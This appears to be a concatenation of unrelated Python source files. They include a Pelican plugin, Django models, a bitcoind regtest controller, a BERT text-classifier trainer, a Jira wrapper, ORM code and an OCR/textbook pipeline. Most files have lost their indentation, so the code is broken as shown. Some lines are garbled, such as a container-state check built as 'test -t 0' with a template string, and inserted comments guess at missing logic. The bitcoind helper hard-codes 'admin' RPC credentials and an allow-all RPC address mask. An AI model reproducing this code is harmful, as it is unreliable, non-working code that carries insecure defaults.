pintool.launch(args.pgm, args.args, infile, logdir, "-l true" if not args.ignore_libs else None)
# Get results
for an in analysis:
Log.stdout("extracting results")
res = Result(default_log_path(logdir, args.pgm, an))
# Print the results
Log.stdout("results of inference:")
res.display()
|
from pelican import signals
from typographeur import typographeur
def apply_rules_for_articles(articleGenerator):
settings = articleGenerator.settings
for article in articleGenerator.articles:
article._content = typographeur(article._content, fix_semicolon=False)
def apply_rules_for_pages(pageGenerator):
for page in pageGenerator.pages:
page._content = typographeur(page._content, fix_semicolon=False)
def register():
signals.article_generator_finalized.connect(apply_rules_for_articles)
signals.page_generator_finalized.connect(apply_rules_for_pages)
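# Note added for orientation: to activate this plugin, Pelican's configuration needs to
# reference it, e.g. PLUGINS = ["typographeur_plugin"] in pelicanconf.py (the module
# name here is hypothetical and depends on how this file is installed).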
|
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
class TaskState(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Task(models.Model):
owner = models.ForeignKey(User)
title = models.CharField(max_length=200)
description = models.TextField()
state = models.ForeignKey(TaskState)
create_date = models.DateTimeField(auto_now_add=True)
|
""" Control the custom nodes throughout """
import config
daemon = 'bitcoind '
args = {
'regtest': '-regtest',
'datadir': '-datadir=' + config.bitcoin_data_dir,
# log all events relevant for parsing
'debug': '-debug=cmpctblock -debug=net -debug=mempool', # For mempool
'logtimemicros': '-logtimemicros', # DO NOT CHANGE TO OTHER UNIT
'onlynet': '-onlynet=ipv4',
'dnsseed': '-dnsseed=0', # Set to 0 to avoid fall back to hardcoded one
'reindex': '-reindex', # for correct order of transactions
'checkmempool': '-checkmempool=0', # To have store of mempool
'keypool': '-keypool=1', # Keypool of wallet address
# RPC configuration
'rpcuser': '-rpcuser=admin',
'rpcpassword': '-rpcpassword=admin',
'rpcallowip': '-rpcallowip=1.1.1.1/0.0.0.0',
'rpcservertimeout': '-rpcservertimeout=' + str(config.rpc_timeout),
}
def start(name, ip, path, connect_to_ips):
    return_args = args.copy()
    cmd = transform_to_cmd(return_args)
    for _ip in connect_to_ips:
        cmd += ' -connect=' + str(_ip)
    # assumption: return the assembled command for this node via exec_cmd, mirroring the
    # other helpers in this module (the original built cmd but never used it)
    return exec_cmd(name, cmd)
def exec_cmd(node, cmd):
return './btcd {}{} {}'.format(config.prefix, node, cmd)
def transform_to_cmd(args_to_transform):
return daemon + ' '.join(args_to_transform.values())
def rm_peers(node):
return exec_cmd(node, 'rm -f {}/regtest/peers.dat'.format(config.bitcoin_data_dir))
def check_if_running(name):
return 'test -t 0 {{{{.State.Running}}}} {0}{1}'.format(config.prefix, name)
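# Usage sketch added for orientation (values depend on config.py and are illustrative):
# transform_to_cmd(args) yields a single command string along the lines of
#   "bitcoind -regtest -datadir=/data -debug=cmpctblock -debug=net -debug=mempool ... -rpcuser=admin ..."
# and start("node0", "10.0.0.1", "/data", ["10.0.0.2"]) additionally appends "-connect=10.0.0.2"
# for each peer in connect_to_ips.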
|
import os
CACHE_DIR = 'cache'
def make_cache(name, content):
"""
Create cache with given content.
:param str name -- Name, or key of the cache.
:param str content -- Content of the cache
:return bool -- If True, the content is changed with previously cached
content. I.E. should process the updated content.
"""
if not os.path.exists(CACHE_DIR):
os.makedirs(CACHE_DIR)
path = os.path.join(CACHE_DIR, name)
if not os.path.exists(path):
return _write_cache(name, content)
with open(path, 'r') as file:
read = file.read()
if content == read:
return False
else:
return _write_cache(name, content)
def _write_cache(name, content):
"""
Write content into cache.
:return bool -- True.
"""
with open(os.path.join(CACHE_DIR, name), 'w') as file:
file.write(content)
return True
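# The block below is a small illustrative self-check added for orientation; the key and
# content values are arbitrary and it only writes one small file under CACHE_DIR.
if __name__ == "__main__":
    changed_first = make_cache("demo-key", "hello")   # first call always caches -> True
    changed_again = make_cache("demo-key", "hello")   # identical content -> False
    print(changed_first, changed_again)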
|
import json
import os
import sys
import time
import re
from optparse import OptionParser
import matplotlib
import torch
from src.batcher import Batcher
from src.save_utils import save_model, load_model
from models.BERT_MLP import BERT_MLP
from models.None_MLP import None_MLP
from models.RNN_MLP import RNN_MLP
from models.CNN_MLP import CNN_MLP
from models.CNNr_MLP import CNNr_MLP
from models.ATT_MLP import ATT_MLP
from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, confusion_matrix
matplotlib.use('agg')
import matplotlib.pyplot as plt
def _calc_running_avg_loss(loss, running_avg_loss, decay=0.99):
return decay * running_avg_loss + (1. - decay) * loss if running_avg_loss != 0 else loss
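# Illustration of the exponentially-weighted running average above: starting from 0 the
# first loss is taken as-is; afterwards each new loss contributes (1 - decay) of its value,
# e.g. _calc_running_avg_loss(2.0, 1.0, decay=0.99) returns 0.99 * 1.0 + 0.01 * 2.0 = 1.01.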
def _train_loop_epoch(model, training_generator, validation_generator):
training_loss_epoch = []
validation_loss_epoch = []
for epoch in range(0, options.epoch):
print('\tepoch ' + str(epoch))
loss_train = []
loss_valid = []
for batch in training_generator:
loss, step = model.fit(batch.x, batch.y, batch.msk_conv, batch.msk_msg)
loss_train.append(loss)
for batch in validation_generator:
loss, step = model.valid(batch.x, batch.y, batch.msk_conv, batch.msk_msg)
loss_valid.append(loss)
save_model(model, options.output, epoch, options.keep)
training_loss_epoch.append(sum(loss_train) / len(loss_train))
validation_loss_epoch.append(sum(loss_valid) / len(loss_valid))
return training_loss_epoch, validation_loss_epoch
def _train_loop_auto(model, training_generator, validation_generator):
best_loss = None
running_avg_loss = 0
curr_aging = options.age
training_loss_epoch = []
validation_loss_epoch = []
epoch = 0
while True:
print('\tepoch ' + str(epoch))
loss_train = []
loss_valid = []
for batch in training_generator:
loss, step = model.fit(batch.x, batch.y, batch.msk_conv, batch.msk_msg)
loss_train.append(loss)
for batch in validation_generator:
loss, step = model.valid(batch.x, batch.y, batch.msk_conv, batch.msk_msg)
loss_valid.append(loss)
avg_valid_loss = sum(loss_valid) / len(loss_valid)
running_avg_loss = _calc_running_avg_loss(avg_valid_loss, running_avg_loss, options.decay)
training_loss_epoch.append(sum(loss_train) / len(loss_train))
validation_loss_epoch.append(avg_valid_loss)
if (best_loss is None) or running_avg_loss < best_loss:
print('\tFound a new best loss: {}. Previous best loss: {}'.format(running_avg_loss, best_loss))
best_loss = running_avg_loss
save_model(model, options.output, epoch, options.keep)
curr_aging = options.age
else:
curr_aging -= 1
if curr_aging <= 0:
break
epoch += 1
return training_loss_epoch, validation_loss_epoch
def _compute_metrics(y_test, y_pred, out):
score = accuracy_score(y_test, y_pred)
f1 = f1_score(y_test, y_pred)
prec = precision_score(y_test, y_pred)
rec = recall_score(y_test, y_pred)
matrix = confusion_matrix(y_test, y_pred)
    out.write('Accuracy ' + str(score) + '\n')
out.write('Precision ' + str(prec) + '\n')
out.write('Recall ' + str(rec) + '\n')
out.write('F1 score ' + str(f1) + '\n')
out.write('\n')
out.write(str(matrix))
out.write('\n')
def train_mode(out):
print('Loading...')
# Experiment settings
out.write('*** ' + options.model + ' ***\n\n')
if options.model not in available_models:
        print('Error: unknown model ' + options.model)
return
with open(options.params) as json_file:
json_params = json.load(json_file)
params = json_params[options.model]
# Hyper parameters
    if not re.match(r"\[\s*\d+(\.\d+)?(\s*,\s*\d+(\.\d+)?)*\s*\]", options.weights):
print('Invalid weight parameter')
return sys.exit(22)
params['batch_size'] = options.batch
params['msg_len'] = options.msg
params['conv_len'] = options.conv
params['path'] = options.output
params['mode'] = options.mode
params['bert'] = options.bert
params['save'] = options.save
weights = list(map(lambda x: float(x), options.weights[1:-1].split(',')))
weights = torch.tensor(weights)
out.write('Hyperparameters: ' + '\n')
out.write('\tEpoch ' + str(options.epoch) + '\n')
out.write('\tBatch size ' + str(options.batch) + '\n')
out.write('\tMax conv length ' + str(options.conv) + '\n')
out.write('\tMax msg length ' + str(options.msg) + '\n')
out.write('\t' + str(params) + '\n')
out.write('\t' + str(weights) + '\n')
out.flush()
# Batch generator
training_generator = Batcher(options.train_data_path, params)
validation_generator = Batcher(options.valid_data_path, params)
# Load classifier
out.write('\nUsing device: ' + str(device) + '\n')
if device.type == 'cuda':
out.write(torch.cuda.get_device_name(0) + '\n')
if options.model == 'BERT_MLP':
model = BERT_MLP(device, params, weights)
elif options.model == 'None_MLP':
model = None_MLP(device, params, weights)
elif options.model == 'RNN_MLP':
model = RNN_MLP(device, params, weights)
elif options.model == 'CNN_MLP':
model = CNN_MLP(device, params, weights)
elif options.model == 'CNNr_MLP':
model = CNNr_MLP(device, params, weights)
elif options.model == 'ATT_MLP':
model = ATT_MLP(device, params, weights)
else: # default
print('Model unavailable')
return sys.exit(22)
model = model.to(device)
out.write('\n' + str(model) + '\n')
out.flush()
# Training
print('Training...')
start_time = time.time()
if options.epoch == -1:
training_loss_epoch, validation_loss_epoch = _train_loop_auto(model, training_generator, validation_generator)
else:
training_loss_epoch, validation_loss_epoch = _train_loop_epoch(model, training_generator, validation_generator)
elapsed_time = time.time() - start_time
out.write('\nTime elapsed ' + str(elapsed_time) + '\n')
# Plot training and validation loss
plt.figure()
plt.plot(training_loss_epoch, label='Training loss')
plt.plot(validation_loss_epoch, label='Validation loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.title('Training loss')
plt.legend(loc='upper right')
plt.draw()
plt.savefig(options.output + '/loss_per_epoch.png')
def test_mode(out):
print('Loading...')
# Hyper parameters
params = dict()
params['batch_size'] = 1
params['msg_len'] = options.msg
params['conv_len'] = options.conv
params['mode'] = options.mode
params['bert'] = options.bert
# Loading
out.write('\nUsing device: ' + str(device) + '\n')
if device.type == 'cuda':
out.write(torch.cuda.get_device_name(0) + '\n')
testing_generator = Batcher(options.test, params)
model = load_model(options.checkpoint)
model = model.to(device)
out.write('\n' + str(model) + '\n')
out.flush()
# Testing
print('Testing...')
y_pred = []
y_test = []
for batch in testing_generator:
pred_y, _ = model.predict(batch.x, batch.msk_conv, batch.msk_msg, no_batch=True)
true_y = list(filter(lambda z: z != -1, batch.y.view(params['batch_size'] * params['conv_len']).tolist()))
y_pred.extend(pred_y)
y_test.extend(true_y)
    _compute_metrics(y_test, y_pred, out)
def demo_mode(out):
print('Loading...')
# Hyper parameters
params = dict()
params['batch_size'] = 1
params['msg_len'] = options.msg
params['conv_len'] = options.conv
params['mode'] = options.mode
params['bert'] = options.bert
# Loading
testing_generator = Batcher(options.demo, params)
model = load_model(options.checkpoint)
model = model.to(device)
print('Running...')
predictions = {}
for batch in testing_generator:
pred_y, score_y = model.predict(batch.x, batch.msk_conv, batch.msk_msg, no_batch=True)
true_y = batch.y.tolist()[0]
predictions[batch.id] = tuple(zip(batch.original, pred_y, score_y, true_y))
print('Writing results...')
out.write('id;text;pred;score;gold\n')
for k, val in predictions.items():
for msg in val:
text = []
tokens = msg[0].split(' ')
for tok in tokens:
if tok.startswith('##'):
text[-1] = text[-1] + tok[2:]
else:
text.append(tok)
text = ' '.join(text)
out.write(k + ';' + text + ';' + str(msg[1]) + ';' + str(msg[2]) + ';' + str(msg[3]) + '\n')
def main():
if options.mode == 'train':
with open(options.output + '/out.txt', 'w') as out:
train_mode(out)
elif options.mode == 'test':
with open(options.output + '/test.txt', 'w') as out:
test_mode(out)
elif options.mode == 'demo':
with open(options.output + '/demo.csv', 'w', encoding='utf-8') as out:
demo_mode(out)
else:
print('Error: unknown mode')
return sys.exit(22)
if __name__ == "__main__":
print("INH classifier\n")
argv = sys.argv[1:]
parser = OptionParser()
# classifier
parser.add_option("-m", "--mode", help='mode', action="store", type="string", dest="mode",
default="train")
parser.add_option("-o", "--output", help='output folder', action="store", type="string", dest="output",
default="../../output/inh")
parser.add_option("-t", "--tokenizer", help='bert tokenizer', action="store", type="string", dest="bert",
default="dbmdz/bert-base-italian-cased")
# training
parser.add_option("--train_data_path", help="path to train dataset", action="store", type="string",
default='../../input/inh/train.bin')
parser.add_option("--valid_data_path", help="path to valid dataset", action="store", type="string",
default='../../input/inh/valid.bin')
parser.add_option("--param", help='parameters', action="store", type="string", dest="params",
default="../../input/inh/parameters.json")
parser.add_option("-c", "--classifier", help='classifier model', action="store", type="string", dest="model",
default="CNNr_MLP")
parser.add_option("-e", "--epoch", help='epoch', action="store", type="int", dest="epoch",
default=-1) # -1 for early stopping
parser.add_option("-a", "--age", help='max age', action="store", type="int", dest="age",
default=5)
parser.add_option("-d", "--decay", help='decay', action="store", type="float", dest="decay",
default=0.90)
parser.add_option("-b", "--batch", help='batch size', action="store", type="int", dest="batch",
default=4)
parser.add_option("-s", "--save", help='save step', action="store", type="int", dest="save",
default=100)
parser.add_option("-w", "--weight", help='loss weights', action="store", type="string", dest="weights",
default="[1.10, 11.20]")
parser.add_option("--keep", help='max keep', action="store", type="int", dest="keep",
default=20)
parser.add_option("--conv", help='conv length', action="store", type="int", dest="conv",
default=6)
parser.add_option("--msg", help='msg length', action="store", type="int", dest="msg",
default=20)
# test and demo
parser.add_option("--test_data", help='test dataset', action="store", type="string", dest="test",
default="../../input/inh/valid.bin")
parser.add_option("--demo_data", help='demo data folder', action="store", type="string", dest="demo",
default="../../input/inh/run.bin")
parser.add_option("-k", "--checkpoint", help='checkpoint', action="store", type="string", dest="checkpoint",
default="../../output/inh/checkpoint/model.pt")
(options, args) = parser.parse_args()
torch.manual_seed(42)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
available_models = ['BERT_MLP', 'None_MLP', 'RNN_MLP', 'CNN_MLP', 'CNNr_MLP', 'ATT_MLP']
if options.mode == 'train' and len(os.listdir(options.output)) != 0:
print('Warning: output directory is not empty, results will be overwritten\n')
cont = input('Continue (Y|n)? ')
if cont != 'Y':
exit(0)
main()
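# Invocation sketch added for orientation (the script/file name and paths are illustrative,
# the option names and defaults are the ones defined above):
#   python classifier.py -m train -c CNNr_MLP -b 4 -e -1 \
#       --train_data_path ../../input/inh/train.bin --valid_data_path ../../input/inh/valid.bin
#   python classifier.py -m test -k ../../output/inh/checkpoint/model.pt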
|
from jira.client import JIRA
from settings import JIRA_NAME, JIRA_PW, JIRA_SERVER
class JiraWrapper:
def __init__(self):
if not hasattr(self, '_jira'):
self._jira = JIRA(
basic_auth=(JIRA_NAME, JIRA_PW),
options={'server': JIRA_SERVER}
)
self._issue = None
def get_info(self):
return {
'ticketname': self._issue.key,
'reporter': self._issue.fields.reporter.displayName,
'updated': self._issue.fields.updated,
'description': self._issue.fields.description,
'issuetype': self._issue.fields.issuetype,
'labels': self._issue.fields.labels,
'priority': self._issue.fields.priority,
'status': self._issue.fields.status,
'summary': self._issue.fields.summary,
'assignee': self._issue.fields.assignee.displayName
}
def set_issue(self, issue_str):
self.issue_str = issue_str
self._issue = self._jira.issue(issue_str)
def get_states(self):
self._states = []
t = self._jira.transitions(self._issue)
for i in t:
            self._states.append((i['to']['name'], i['id']))  # assumption: a (name, id) tuple keeps the pairing ordered
            print('%s: %s' % (i['id'], i['to']['name']))
def set_state(self, id):
self._jira.transition_issue(self._issue, str(id))
self.get_states()
def exec_jql(self, jql):
return self._jira.search_issues(jql)
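# Usage sketch added for orientation (assumes JIRA_NAME, JIRA_PW and JIRA_SERVER are set
# in settings.py; the issue key is hypothetical):
# wrapper = JiraWrapper()
# wrapper.set_issue("PROJ-123")
# print(wrapper.get_info()["summary"])
# wrapper.get_states()   # prints and stores the transitions available for the issue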
|
from apps.announcement import views
from django.urls import path
app_name = "announcement"
urlpatterns = [
path("announcements/", views.AnnouncementViewSet.as_view({"get": "list"})),
path(
"announcements/<int:pk>/",
views.AnnouncementViewSet.as_view({"get": "retrieve"}),
),
path(
"bookmarks/", views.BookmarkViewSet.as_view({"get": "list", "post": "create"})
),
path(
"bookmarks/<int:pk>/",
views.BookmarkViewSet.as_view({"delete": "destroy"}),
),
]
|
import numpy as np
from ..helper import drawStart
from ..world import World
from ..car import Car
from ..image import Image
class Options:
def __init__(
self, track=True, cones=True, car=True, lidar=False, start=True
) -> None:
self.track = track
self.cones = cones
self.car = car
self.lidar = lidar
self.start = start
class Simulation:
def __init__(self, world: World, car: Car) -> None:
self.world = world
self.car = car
def lidarImage(self):
scan = self.car.scan(self.world)
def generateImage(
self,
options: Options = Options(),
) -> Image:
if options.track:
image = self.world.trackImage()
else:
image = Image(self.world.field.blank())
if options.cones:
image = World.addCones(image, self.world.cones)
if options.car:
image = self.car.draw(image)
if options.start:
image = drawStart(image, self.world.track.track(0), self.world.field)
if options.lidar:
image = self.car.drawScan(image, self.world)
return image
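# Usage sketch added for orientation (assumes World and Car instances were built elsewhere):
# sim = Simulation(world, car)
# image = sim.generateImage(Options(track=True, cones=True, car=True, lidar=False, start=True))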
|
from rest_framework import serializers
from django.contrib.auth.models import User
from .models import Profile, Project
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('username',)
class ProfileSerializer(serializers.ModelSerializer):
account_holder = UserSerializer()
class Meta:
model = Profile
fields = '__all__'
class ProjectSerializer(serializers.ModelSerializer):
profile = ProfileSerializer()
class Meta:
model = Project
fields = '__all__'
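# Usage sketch added for orientation (project_instance is a hypothetical Project object):
# data = ProjectSerializer(project_instance).data
# # -> {'profile': {'account_holder': {'username': ...}, ...}, ...} with all model fields nested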
|
# make files in this directory importable
"""A selection of genetic algorithm code."""
__docformat__ = "restructuredtext en"
|
from netapp.ntdtest.group8_multiple_info import Group8MultipleInfo
from netapp.netapp_object import NetAppObject
class Group7MultipleInfo(NetAppObject):
"""
1st nested typedef at level 1
"""
_zfield5 = None
@property
def zfield5(self):
"""
Generic/Dummy Field 5
Attributes: required-for-create, modifiable
"""
return self._zfield5
@zfield5.setter
def zfield5(self, val):
        if val is not None:
self.validate('zfield5', val)
self._zfield5 = val
_group4_stats = None
@property
def group4_stats(self):
"""
2nd nested typedef at level 1
"""
return self._group4_stats
@group4_stats.setter
def group4_stats(self, val):
        if val is not None:
self.validate('group4_stats', val)
self._group4_stats = val
@staticmethod
def get_api_name():
return "group7-multiple-info"
@staticmethod
def get_desired_attrs():
return [
'zfield5',
'group4-stats',
]
def describe_properties(self):
return {
'zfield5': { 'class': basestring, 'is_list': True, 'required': 'optional' },
'group4_stats': { 'class': Group8MultipleInfo, 'is_list': False, 'required': 'optional' },
}
|
from .__version__ import __version__, __author__, __author_email__, __url__, __download_url__, __title__
from .cmpa import compare, Compare
|
from projex.lazymodule import lazy_import
from ..sqliteconnection import SQLiteStatement
orb = lazy_import('orb')
class CREATE(SQLiteStatement):
def __call__(self, model, owner='', includeReferences=True):
if issubclass(model, orb.Table):
return self._createTable(model, owner, includeReferences)
elif issubclass(model, orb.View):
return self._createView(model, owner, includeReferences)
else:
            raise orb.errors.OrbError('Cannot create model for type: {0}'.format(type(model)))
def _createTable(self, model, owner, includeReferences):
ADD_COLUMN = self.byName('ADD COLUMN')
add_i18n = []
add_standard = []
# divide columns between standard and translatable
for col in model.schema().columns(recurse=False).values():
if col.testFlag(col.Flags.Virtual):
continue
if not includeReferences and isinstance(col, orb.ReferenceColumn):
continue
if col.testFlag(col.Flags.I18n):
add_i18n.append(col)
else:
add_standard.append(col)
# create the standard model
cmd_body = []
if add_standard:
cmd_body += [ADD_COLUMN(col)[0].replace('ADD COLUMN ', '') for col in add_standard]
inherits = model.schema().inherits()
if inherits:
inherits_model = orb.system.model(inherits)
if not inherits_model:
raise orb.errors.ModelNotFound(schema=inherits)
cmd_body.append('__base_id INTEGER')
        # get the primary column (pcol is defined unconditionally because the i18n table below also needs it)
        id_column = model.schema().idColumn()
        pcol = '`{0}`'.format(id_column.field()) if id_column else ''
        if id_column and not inherits:
            cmd_body.append('CONSTRAINT `{0}_pkey` PRIMARY KEY ({1})'.format(model.schema().dbname(), pcol))
body = ',\n\t'.join(cmd_body)
if body:
body = '\n\t' + body + '\n'
cmd = 'CREATE TABLE IF NOT EXISTS `{table}` ({body});\n'
cmd = cmd.format(table=model.schema().dbname(), body=body, owner=owner)
# create the i18n model
if add_i18n:
id_column = model.schema().idColumn()
id_type = id_column.dbType('SQLite')
i18n_body = ',\n\t'.join([ADD_COLUMN(col)[0].replace('ADD COLUMN ', '') for col in add_i18n])
i18n_cmd = 'CREATE TABLE `{table}_i18n` (\n'
i18n_cmd += ' `locale` CHARACTER VARYING(5),\n'
i18n_cmd += ' `{table}_id` {id_type} REFERENCES `{table}` ({pcol}),\n'
i18n_cmd += ' {body},\n'
i18n_cmd += ' CONSTRAINT `{table}_i18n_pkey` PRIMARY KEY (`{table}_id`, `locale`)\n'
i18n_cmd += ');\n'
i18n_cmd = i18n_cmd.format(table=model.schema().dbname(),
id_type=id_type, pcol=pcol, body=i18n_body, owner=owner)
cmd += '\n' + i18n_cmd
return cmd, {}
SQLiteStatement.registerAddon('CREATE', CREATE())
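# Orientation sketch (not authoritative; the exact column SQL comes from the 'ADD COLUMN'
# addon): for a simple non-inheriting table the statement assembled above has the shape
#   CREATE TABLE IF NOT EXISTS `my_table` (
#       <column definitions>,
#       CONSTRAINT `my_table_pkey` PRIMARY KEY (`id`)
#   );
# plus a companion `my_table_i18n` table when translatable (I18n) columns are present.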
|
import ast
import configparser
import json
import logging
import os
# import pyvips
import pickle
import re
import time
import pandas as pd
from PIL import Image
from daggit.contrib.sunbird.oplib.content_reuse_utils import agg_actual_predict_df
from daggit.contrib.sunbird.oplib.content_reuse_utils import aggregation_topic_level
from daggit.contrib.sunbird.oplib.content_reuse_utils import append_cosine_similarity_score
from daggit.contrib.sunbird.oplib.content_reuse_utils import connect_to_graph, create_node_relationships
from daggit.contrib.sunbird.oplib.content_reuse_utils import create_manifest
from daggit.contrib.sunbird.oplib.content_reuse_utils import create_toc
from daggit.contrib.sunbird.oplib.content_reuse_utils import generate_cosine_similarity_score
from daggit.contrib.sunbird.oplib.content_reuse_utils import getDTB, calc_stat
from daggit.contrib.sunbird.oplib.content_reuse_utils import getSimilarTopic
from daggit.contrib.sunbird.oplib.content_reuse_utils import getblob
from daggit.contrib.sunbird.oplib.content_reuse_utils import k_topic_recommendation
from daggit.contrib.sunbird.oplib.content_reuse_utils import modify_df, listify
from daggit.contrib.sunbird.oplib.content_reuse_utils import scoring_module, filter_by_grade_range
from daggit.contrib.sunbird.oplib.dtb import create_dtb
from daggit.core.base.factory import BaseOperator
from daggit.core.io.io import File_IO, File_Txt
from daggit.core.io.io import ReadDaggitTask_Folderpath
from daggit.contrib.sunbird.oplib.contentreuseEvaluationUtils import text_image
from daggit.core.oplib import distanceUtils as dist
from daggit.core.oplib import nlp as preprocess
from natsort import natsorted
class OcrTextExtraction(BaseOperator):
@property
def inputs(self):
"""
Function that the OcrTextExtraction operator defines while returning graph inputs
:returns: Inputs to the node of the Auto tagging graph
DS_DATA_HOME: a localpath where the folders get created
pathTocredentials: path to config file with credentials
pathToPDF: path to PDF file
"""
return {
"DS_DATA_HOME": File_IO(self.node.inputs[0]),
"pathTocredentials": File_IO(self.node.inputs[1]),
"pathToPDF": File_IO(self.node.inputs[2])
}
@property
def outputs(self):
"""
Function that the OcrTextExtraction operator defines while returning graph outputs
:returns: Returns the path to the folder in which text extraction results get generated
"""
return {"path_to_result_folder": File_IO(
self.node.outputs[0])}
def run(self, gcp_bucket_name, ocr_method, content_id):
DS_DATA_HOME = self.inputs["DS_DATA_HOME"].read()
pathTocredentials = self.inputs["pathTocredentials"].read()
path_to_PDF_file = self.inputs["pathToPDF"].read()
status = False
if os.path.exists(pathTocredentials):
try:
config = configparser.ConfigParser(allow_no_value=True)
config.read(pathTocredentials)
api_key = config["postman credentials"]["api_key"]
postman_token = config["postman credentials"]["postman_token"]
status = True
try:
path_to_googlecred = config['google application credentials']["GOOGLE_APPLICATION_CREDENTIALS"]
with open(path_to_googlecred, "r") as cred_json:
GOOGLE_APPLICATION_CREDENTIALS = cred_json.read()
except BaseException:
logging.info("Invalid GOOGLE_APPLICATION_CREDENTIALS in config.")
logging.info("***Checking for GOOGLE_APPLICATION_CREDENTIALS environment variable")
status = False
except BaseException:
logging.info("Invalid config file")
logging.info("***Checking for GOOGLE_APPLICATION_CREDENTIALS environment variable")
if not status:
try:
GOOGLE_APPLICATION_CREDENTIALS = os.environ['GOOGLE_APPLICATION_CREDENTIALS']
with open(GOOGLE_APPLICATION_CREDENTIALS, "r") as f:
GOOGLE_APPLICATION_CREDENTIALS = f.read()
except BaseException:
GOOGLE_APPLICATION_CREDENTIALS = ""
logging.info("Not a valid google credential")
# content dump:
if os.path.exists(path_to_PDF_file):
try:
print("Content ID: ", content_id)
print("-------Performing OCR TextExtraction-------")
print("path_to_pdf: ", path_to_PDF_file)
path_to_saved_folder = ""
start = time.time()
path_to_saved_folder = getblob(ocr_method, gcp_bucket_name, path_to_PDF_file, content_id, DS_DATA_HOME)
stop = time.time()
time_consumed = stop - start
time_consumed_minutes = time_consumed / 60.0
print("Time consumed in minutes: ", time_consumed_minutes)
print()
except:
print("Error in OCR process!!")
# Create manifest.json and content TOC
path_to_manifest = create_manifest(content_id, path_to_saved_folder)
path_to_toc = create_toc(content_id, path_to_saved_folder, api_key, postman_token)
else:
print("The path to pdf file doesnot exist!!")
self.outputs["path_to_result_folder"].write(path_to_saved_folder)
class TextExtractionEvaluation(BaseOperator):
@property
def inputs(self):
"""
Function that the OcrTextExtraction operator defines while returning graph inputs
:returns: Inputs to the node of the Auto tagging graph
DS_DATA_HOME: a localpath where the folders get created
pathTocredentials: path to config file with credentials
pathToPDF: path to PDF file
"""
return {
"path_to_result_folder": File_IO(self.node.inputs[0]),
"pathToLanguageMapping": File_IO(self.node.inputs[1]),
"pathToToc": File_IO(self.node.inputs[2])
}
@property
def outputs(self):
"""
Function that the OcrTextExtraction operator defines while returning graph outputs
:returns: Returns the path to the folder in which text extraction results get generated
"""
return {"path_to_validation_pdf": File_IO(
self.node.outputs[0])}
def run(self):
target_folder = self.inputs["path_to_result_folder"].read()
language_mapping_loc = self.inputs["pathToLanguageMapping"].read()
path_to_toc = self.inputs["pathToToc"].read()
evaluation_folder = os.path.join(target_folder, "evaluation")
if not os.path.exists(evaluation_folder):
os.makedirs(evaluation_folder)
output_loc = os.path.join(evaluation_folder, "text_extraction_validation")
if not os.path.exists(output_loc):
os.mkdir(output_loc)
pdf_files = [i for i in os.listdir(os.path.join(target_folder, "source")) if i != '.DS_Store']
pdf_ocr_loc_ls = []
for i in range(len(pdf_files)):
pdf_loc = os.path.join(target_folder, "source", pdf_files[i])
print(pdf_loc)
google_ocr_loc = os.path.join(target_folder, "raw_data", os.path.split(target_folder)[1])
pdf_ocr_loc_ls.append([pdf_loc, google_ocr_loc])
toc_df = pd.read_csv(path_to_toc)
medium = [i for i in toc_df["Medium"].unique() if str(i) != "nan"][0]
for i in range(len(pdf_ocr_loc_ls)):
text_image(pdf_ocr_loc_ls[i][0], pdf_ocr_loc_ls[i][1], medium, language_mapping_loc, 1, output_loc)
image_ls = [i for i in os.listdir(output_loc) if i.endswith(".png")]
ls = [i for i in natsorted(image_ls, reverse=False)]
image_ls_open = [Image.open(os.path.join(output_loc, str(i))) for i in ls]
pdf_filename = os.path.join(output_loc, "validation.pdf")
image_ls_open[0].save(pdf_filename, "PDF", resolution=100.0, save_all=True, append_images=image_ls_open[1:])
for files in image_ls:
os.remove(os.path.join(output_loc, str(files)))
self.outputs["path_to_validation_pdf"].write(pdf_filename)
class CreateDTB(BaseOperator):
@property
def inputs(self):
"""
Inputs needed to create DTB
:returns: toc and text files
"""
return {
"path_to_result_folder": File_IO(self.node.inputs[0]),
"pathToToc": File_IO(self.node.inputs[1]),
}
@property
def outputs(self):
"""
Outputs created while creating DTB
:returns: Returns the path to the DTB file
"""
return {"path_to_dtb_json_file": File_IO(
self.node.outputs[0])}
def run(self, col_name):
"""
        Creates the DTB by aligning the ToC with the text extracted from the textbook
:returns: Returns the path to the DTB file
"""
path_to_result_folder = self.inputs["path_to_result_folder"].read()
path_to_toc = self.inputs["pathToToc"].read()
path_to_text = os.path.join(path_to_result_folder, "extract", "GOCR", "text", "fulltext_annotation.txt")
dtb = create_dtb(path_to_toc, path_to_text, col_name)
path_to_dtb_json_file = os.path.join(path_to_result_folder, "DTB.json")
with open(path_to_dtb_json_file, "w") as outfile:
json.dump(dtb, outfile, indent=4)
self.outputs["path_to_dtb_json_file"].write(path_to_dtb_json_file)
class DTBCreationEvaluation(BaseOperator):
@property
def inputs(self):
"""
Function that the DTBCreationEvaluation operator defines while returning graph inputs
:returns: Inputs to the node of the Content Reuse graph
path_to_result_folder: path to result folder
path_to_dtb_json_file: path to predicted DTB file
pathToToc: path to TOC
pathToActualDTB: path to actual DTB
"""
return {
"path_to_dtb_json_file": File_IO(self.node.inputs[0]),
"pathToToc": File_IO(self.node.inputs[1]),
"pathToActualDTB": File_IO(self.node.inputs[2])
}
@property
def outputs(self):
"""
Function that the DTBMapping operator defines while returning graph outputs
:returns: Returns the path to the mapping json file
"""
return {"path_to_dtb_evaluation_result": File_IO(
self.node.outputs[0])}
def run(self, level):
dtb_pred_loc = self.inputs['path_to_dtb_json_file'].read()
        assert os.path.exists(dtb_pred_loc)
path_to_result_folder = os.path.split(dtb_pred_loc)[0]
evaluation_folder = os.path.join(path_to_result_folder, "evaluation")
if not os.path.exists(evaluation_folder):
os.makedirs(evaluation_folder)
text_loc = os.path.join(path_to_result_folder, "extract", "GOCR", "text", "fulltext_annotation.txt")
dtb_actual_loc = self.inputs['pathToActualDTB'].read()
toc_df_loc = self.inputs['pathToToc'].read()
output_loc = os.path.join(evaluation_folder, "DTB_creation_evaluation.csv")
toc_df = pd.read_csv(toc_df_loc)
dtb_actual = pd.read_csv(dtb_actual_loc)
if 'Toc feature' in dtb_actual.columns:
with open(text_loc, 'r') as txt_file:
text = txt_file.read()
with open(dtb_pred_loc, 'r') as f:
dtb_predicted = json.load(f)
text_read_ = preprocess.strip_word_number([text], " ")[0]
text_read_ = re.sub(' +', ' ', text_read_)
